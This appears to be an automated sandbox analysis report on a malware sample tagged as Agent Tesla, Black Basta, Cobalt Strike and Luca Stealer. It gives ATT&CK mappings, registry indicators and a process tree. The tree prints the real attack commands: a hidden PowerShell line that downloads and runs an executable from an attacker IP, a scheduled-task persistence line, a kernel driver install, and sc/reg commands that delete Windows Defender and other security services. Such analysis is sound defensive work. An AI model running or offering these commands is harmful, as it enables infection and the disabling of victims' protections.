4080	sc.exe
4092	sc.exe
6088	sc.exe
2496	sc.exe
4848	sc.exe
1292	sc.exe
5804	sc.exe
4524	sc.exe
2700	sc.exe
5796	sc.exe
1980	sc.exe
2716	sc.exe
5160	sc.exe
3112	sc.exe
4972	sc.exe
3864	sc.exe
5888	sc.exe
3136	sc.exe
1244	sc.exe
2996	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 7 IoCs

pid	pid_target	Process	procid_target
5336	2472	WerFault.exe	539
25548	9036	WerFault.exe	591
25556	784	WerFault.exe	583
25580	4696	WerFault.exe	584
6716	548	WerFault.exe	581
8636	548	WerFault.exe	581
17948	8712	WerFault.exe	635

System Location Discovery: System Language Discovery 1 TTPs 57 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6dbecdb1f3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PowerShell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7866b52300.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempU55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6a8d5b79b0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	22.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	194b034ebb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2609233090.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eb2df5e704.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e214b0379a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	22.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe

Delays execution with timeout.exe 3 IoCs

defense_evasion

pid	Process
2500	timeout.exe
7008	timeout.exe
5680	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133877365975674216"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings	rapes.exe

Modifies registry key 1 TTPs 9 IoCs

Modify Registry

T1112

pid	Process
2308	reg.exe
4544	reg.exe
4216	reg.exe
220	reg.exe
2964	reg.exe
6048	reg.exe
4876	reg.exe
2432	reg.exe
3620	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
60	schtasks.exe
5860	schtasks.exe
1104	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4648	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
976	powershell.exe
976	powershell.exe
2424	TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE
2424	TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE
6112	rapes.exe
6112	rapes.exe
4648	powershell.exe
4648	powershell.exe
4648	powershell.exe
4620	powershell.exe
4620	powershell.exe
4620	powershell.exe
3336	powershell.exe
3336	powershell.exe
3336	powershell.exe
1224	TempU55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE
1224	TempU55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3468	powershell.exe
3468	powershell.exe
3468	powershell.exe
1988	powershell.exe
1988	powershell.exe
1988	powershell.exe
1684	powershell.exe
1684	powershell.exe
1684	powershell.exe
4676	MSBuild.exe
4676	MSBuild.exe
4676	MSBuild.exe
4676	MSBuild.exe
4112	483d2fa8a0d53818306efeb32d3.exe
4112	483d2fa8a0d53818306efeb32d3.exe
1228	rapes.exe
1228	rapes.exe
3280	7866b52300.exe
3280	7866b52300.exe
3280	7866b52300.exe
3280	7866b52300.exe
3280	7866b52300.exe
3280	7866b52300.exe
4712	MSBuild.exe
4712	MSBuild.exe
4712	MSBuild.exe
4712	MSBuild.exe
4612	MSBuild.exe
4612	MSBuild.exe
3596	194b034ebb.exe
3596	194b034ebb.exe
2980	MSBuild.exe
2980	MSBuild.exe
2980	MSBuild.exe
2980	MSBuild.exe
4612	MSBuild.exe
4612	MSBuild.exe
4320	chrome.exe
4320	chrome.exe
468	Bell_Setup16.tmp
468	Bell_Setup16.tmp
4900	regsvr32.exe
4900	regsvr32.exe
3008	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
660	Process not Found
660	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
1208	msedge.exe
1208	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	976	powershell.exe
Token: SeDebugPrivilege	4648	powershell.exe
Token: SeDebugPrivilege	4620	powershell.exe
Token: SeDebugPrivilege	3336	powershell.exe
Token: SeDebugPrivilege	3928	powershell.exe
Token: SeDebugPrivilege	3468	powershell.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeIncreaseQuotaPrivilege	3008	powershell.exe
Token: SeSecurityPrivilege	3008	powershell.exe
Token: SeTakeOwnershipPrivilege	3008	powershell.exe
Token: SeLoadDriverPrivilege	3008	powershell.exe
Token: SeSystemProfilePrivilege	3008	powershell.exe
Token: SeSystemtimePrivilege	3008	powershell.exe
Token: SeProfSingleProcessPrivilege	3008	powershell.exe
Token: SeIncBasePriorityPrivilege	3008	powershell.exe
Token: SeCreatePagefilePrivilege	3008	powershell.exe
Token: SeBackupPrivilege	3008	powershell.exe
Token: SeRestorePrivilege	3008	powershell.exe
Token: SeShutdownPrivilege	3008	powershell.exe
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeSystemEnvironmentPrivilege	3008	powershell.exe
Token: SeRemoteShutdownPrivilege	3008	powershell.exe
Token: SeUndockPrivilege	3008	powershell.exe
Token: SeManageVolumePrivilege	3008	powershell.exe
Token: 33	3008	powershell.exe
Token: 34	3008	powershell.exe
Token: 35	3008	powershell.exe
Token: 36	3008	powershell.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeDebugPrivilege	5680	PowerShell.exe
Token: SeShutdownPrivilege	4320	chrome.exe
Token: SeCreatePagefilePrivilege	4320	chrome.exe
Token: SeIncreaseQuotaPrivilege	5680	PowerShell.exe
Token: SeSecurityPrivilege	5680	PowerShell.exe
Token: SeTakeOwnershipPrivilege	5680	PowerShell.exe
Token: SeLoadDriverPrivilege	5680	PowerShell.exe
Token: SeSystemProfilePrivilege	5680	PowerShell.exe
Token: SeSystemtimePrivilege	5680	PowerShell.exe
Token: SeProfSingleProcessPrivilege	5680	PowerShell.exe
Token: SeIncBasePriorityPrivilege	5680	PowerShell.exe
Token: SeCreatePagefilePrivilege	5680	PowerShell.exe
Token: SeBackupPrivilege	5680	PowerShell.exe
Token: SeRestorePrivilege	5680	PowerShell.exe
Token: SeShutdownPrivilege	5680	PowerShell.exe
Token: SeDebugPrivilege	5680	PowerShell.exe
Token: SeSystemEnvironmentPrivilege	5680	PowerShell.exe
Token: SeRemoteShutdownPrivilege	5680	PowerShell.exe
Token: SeUndockPrivilege	5680	PowerShell.exe
Token: SeManageVolumePrivilege	5680	PowerShell.exe
Token: 33	5680	PowerShell.exe
Token: 34	5680	PowerShell.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
1796	2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1796	2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1796	2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1680	e214b0379a.exe
1680	e214b0379a.exe
1680	e214b0379a.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
4320	chrome.exe
468	Bell_Setup16.tmp
1208	msedge.exe

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
1796	2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1796	2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1796	2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1680	e214b0379a.exe
1680	e214b0379a.exe
1680	e214b0379a.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1796 wrote to memory of 5044	1796	2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 1796 wrote to memory of 5044	1796	2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 1796 wrote to memory of 5044	1796	2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 1796 wrote to memory of 3196	1796	2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 1796 wrote to memory of 3196	1796	2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 1796 wrote to memory of 3196	1796	2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 5044 wrote to memory of 60	5044	cmd.exe	90
PID 5044 wrote to memory of 60	5044	cmd.exe	90
PID 5044 wrote to memory of 60	5044	cmd.exe	90
PID 3196 wrote to memory of 976	3196	mshta.exe	92
PID 3196 wrote to memory of 976	3196	mshta.exe	92
PID 3196 wrote to memory of 976	3196	mshta.exe	92
PID 976 wrote to memory of 2424	976	powershell.exe	96
PID 976 wrote to memory of 2424	976	powershell.exe	96
PID 976 wrote to memory of 2424	976	powershell.exe	96
PID 2424 wrote to memory of 6112	2424	TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE	99
PID 2424 wrote to memory of 6112	2424	TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE	99
PID 2424 wrote to memory of 6112	2424	TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE	99
PID 6112 wrote to memory of 4192	6112	rapes.exe	103
PID 6112 wrote to memory of 4192	6112	rapes.exe	103
PID 6112 wrote to memory of 4192	6112	rapes.exe	103
PID 4192 wrote to memory of 5976	4192	apple.exe	106
PID 4192 wrote to memory of 5976	4192	apple.exe	106
PID 4192 wrote to memory of 5976	4192	apple.exe	106
PID 5976 wrote to memory of 1620	5976	22.exe	108
PID 5976 wrote to memory of 1620	5976	22.exe	108
PID 1620 wrote to memory of 1884	1620	cmd.exe	110
PID 1620 wrote to memory of 1884	1620	cmd.exe	110
PID 1620 wrote to memory of 1884	1620	cmd.exe	110
PID 1884 wrote to memory of 2760	1884	22.exe	111
PID 1884 wrote to memory of 2760	1884	22.exe	111
PID 2760 wrote to memory of 5804	2760	cmd.exe	113
PID 2760 wrote to memory of 5804	2760	cmd.exe	113
PID 2760 wrote to memory of 4524	2760	cmd.exe	114
PID 2760 wrote to memory of 4524	2760	cmd.exe	114
PID 2760 wrote to memory of 5680	2760	cmd.exe	115
PID 2760 wrote to memory of 5680	2760	cmd.exe	115
PID 2760 wrote to memory of 2328	2760	cmd.exe	116
PID 2760 wrote to memory of 2328	2760	cmd.exe	116
PID 2760 wrote to memory of 4092	2760	cmd.exe	117
PID 2760 wrote to memory of 4092	2760	cmd.exe	117
PID 2760 wrote to memory of 2960	2760	cmd.exe	118
PID 2760 wrote to memory of 2960	2760	cmd.exe	118
PID 2760 wrote to memory of 516	2760	cmd.exe	119
PID 2760 wrote to memory of 516	2760	cmd.exe	119
PID 2760 wrote to memory of 2700	2760	cmd.exe	120
PID 2760 wrote to memory of 2700	2760	cmd.exe	120
PID 2760 wrote to memory of 6088	2760	cmd.exe	121
PID 2760 wrote to memory of 6088	2760	cmd.exe	121
PID 2760 wrote to memory of 2488	2760	cmd.exe	122
PID 2760 wrote to memory of 2488	2760	cmd.exe	122
PID 2760 wrote to memory of 5796	2760	cmd.exe	123
PID 2760 wrote to memory of 5796	2760	cmd.exe	123
PID 2760 wrote to memory of 1980	2760	cmd.exe	124
PID 2760 wrote to memory of 1980	2760	cmd.exe	124
PID 2760 wrote to memory of 3308	2760	cmd.exe	125
PID 2760 wrote to memory of 3308	2760	cmd.exe	125
PID 2760 wrote to memory of 1840	2760	cmd.exe	126
PID 2760 wrote to memory of 1840	2760	cmd.exe	126
PID 2760 wrote to memory of 5384	2760	cmd.exe	127
PID 2760 wrote to memory of 5384	2760	cmd.exe	127
PID 2760 wrote to memory of 1916	2760	cmd.exe	128
PID 2760 wrote to memory of 1916	2760	cmd.exe	128
PID 2760 wrote to memory of 6120	2760	cmd.exe	129

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-03-29_ed19338ae7b4f14a6300a82555194914_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1796
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn cm7nDmatajg /tr "mshta C:\Users\Admin\AppData\Local\Temp\Hpy6ewu7H.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5044
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn cm7nDmatajg /tr "mshta C:\Users\Admin\AppData\Local\Temp\Hpy6ewu7H.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:60
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\Hpy6ewu7H.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3196
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'QKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:976
  - - C:\Users\Admin\AppData\Local\TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE
      "C:\Users\Admin\AppData\Local\TempQKJCBREUY8QAJNSEMYHWLHCKVLE8MEQ6.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2424
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:6112
      - C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4192
        
        C:\Users\Admin\AppData\Local\Temp\22.exe
        
        "C:\Users\Admin\AppData\Local\Temp\22.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5976
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B304.tmp\B305.tmp\B306.bat C:\Users\Admin\AppData\Local\Temp\22.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1620
        
        C:\Users\Admin\AppData\Local\Temp\22.exe
        
        "C:\Users\Admin\AppData\Local\Temp\22.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1884
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B40E.tmp\B40F.tmp\B410.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"
        10⤵
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:2760
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:5804
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:4524
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:5680
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:2328
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:4092
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2960
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:516
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:2700
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:6088
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:2488
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:5796
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:1980
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:3308
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:1840
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:5384
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:1916
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:6120
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:5376
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:6116
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:3908
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:3892
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        Modifies security service
        
        PID:5316
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:2496
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:2648
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:4200
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:5596
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:3820
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:4912
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:5920
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:4848
        
